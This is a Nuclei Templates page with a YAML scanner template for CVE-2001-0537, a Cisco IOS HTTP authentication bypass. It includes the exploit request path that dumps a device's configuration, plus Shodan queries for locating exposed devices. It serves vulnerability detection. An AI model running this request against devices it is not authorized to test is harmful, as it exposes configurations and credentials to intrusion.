Skip to content
Nuclei Templates

Cisco IOS HTTP Configuration - Authentication Bypass

ID: CVE-2001-0537

Severity: critical

Author: DhiyaneshDK

Tags: cve,cve2001,cisco,ios,auth-bypass

Description

Section titled “Description”

HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL.

YAML Source

Section titled “YAML Source”
id: CVE-2001-0537


info:
  name: Cisco IOS HTTP Configuration - Authentication Bypass
  author: DhiyaneshDK
  severity: critical
  description: |
    HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to the affected device.
  remediation: |
    Apply the appropriate patch or upgrade to a fixed version of the Cisco IOS software.
  reference:
    - https://www.rapid7.com/db/modules/auxiliary/scanner/http/cisco_ios_auth_bypass/
    - https://nvd.nist.gov/vuln/detail/CVE-2001-0537
    - http://www.ciac.org/ciac/bulletins/l-106.shtml
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/6749
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C
    cvss-score: 9.3
    cve-id: CVE-2001-0537
    cwe-id: CWE-287
    epss-score: 0.87683
    epss-percentile: 0.98644
    cpe: cpe:2.3:o:cisco:ios:11.3:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cisco
    product: ios
    shodan-query:
      - product:"Cisco IOS http config" && 200
      - product:"cisco ios http config"
      - cpe:"cpe:2.3:o:cisco:ios"
  tags: cve,cve2001,cisco,ios,auth-bypass


http:
  - method: GET
    path:
      - '{{BaseURL}}/level/16/exec/show/config/CR'


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'service config'
          - 'Switch'
          - 'default-gateway'
        condition: and


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100afc7c731afad2248970b453f590c74a1550743ad33c733ec8cdb1280c40bc0b3022100f939193bb518fd589d14865a23945417345c4f11c7d35a38515bce88fce27849:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2001/CVE-2001-0537.yaml"

View on Github